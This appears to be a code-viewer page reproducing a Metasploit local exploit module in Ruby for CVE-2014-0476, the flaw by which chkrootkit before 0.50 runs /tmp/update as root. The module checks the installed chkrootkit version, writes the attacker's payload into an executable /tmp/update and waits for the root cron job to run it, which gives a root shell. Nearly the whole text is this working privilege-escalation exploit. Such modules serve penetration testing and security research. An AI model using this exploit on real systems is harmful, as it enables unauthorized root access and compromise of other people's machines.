Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7

8
  # This could also be Excellent, but since it requires
9
  # up to one day to pop a shell, let's set it to Manual instead.
10
  Rank = ManualRanking
11

12
  include Msf::Post::File
13
  include Msf::Exploit::FileDropper
14

15
  def initialize(info = {})
16
    super(
17
      update_info(
18
        info,
19
        'Name' => 'Chkrootkit Local Privilege Escalation',
20
        'Description' => %q{
21
          Chkrootkit before 0.50 will run any executable file named /tmp/update
22
          as root, allowing a trivial privilege escalation.
23

24
          WfsDelay is set to 24h, since this is how often a chkrootkit scan is
25
          scheduled by default.
26
        },
27
        'Author' => [
28
          'Thomas Stangner', # Original exploit
29
          'Julien "jvoisin" Voisin' # Metasploit module
30
        ],
31
        'References' => [
32
          ['CVE', '2014-0476'],
33
          ['OSVDB', '107710'],
34
          ['EDB', '33899'],
35
          ['BID', '67813'],
36
          ['URL', 'https://seclists.org/oss-sec/2014/q2/430']
37
        ],
38
        'DisclosureDate' => '2014-06-04',
39
        'License' => MSF_LICENSE,
40
        'Platform' => 'unix',
41
        'Arch' => ARCH_CMD,
42
        'SessionTypes' => ['shell', 'meterpreter'],
43
        'Privileged' => true,
44
        'Stance' => Msf::Exploit::Stance::Passive,
45
        'Targets' => [['Automatic', {}]],
46
        'DefaultTarget' => 0,
47
        'DefaultOptions' => { 'WfsDelay' => 24.hours.seconds.to_i },
48
        'Notes' => {
49
          'Reliability' => [REPEATABLE_SESSION],
50
          'Stability' => [CRASH_SAFE],
51
          'SideEffects' => [ARTIFACTS_ON_DISK]
52
        }
53
      )
54
    )
55

56
    register_options([
57
      OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])
58
    ])
59
  end
60

61
  def check
62
    version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1")
63

64
    if version =~ /chkrootkit version 0\.[1-4]/
65
      CheckCode::Appears
66
    else
67
      CheckCode::Safe
68
    end
69
  end
70

71
  def exploit
72
    print_warning('Rooting depends on the crontab (this could take a while)')
73

74
    write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n")
75
    cmd_exec('chmod +x /tmp/update')
76
    register_file_for_cleanup('/tmp/update')
77

78
    print_status('Payload written to /tmp/update')
79
    print_status('Waiting for chkrootkit to run via cron...')
80
  end
81
end
82

83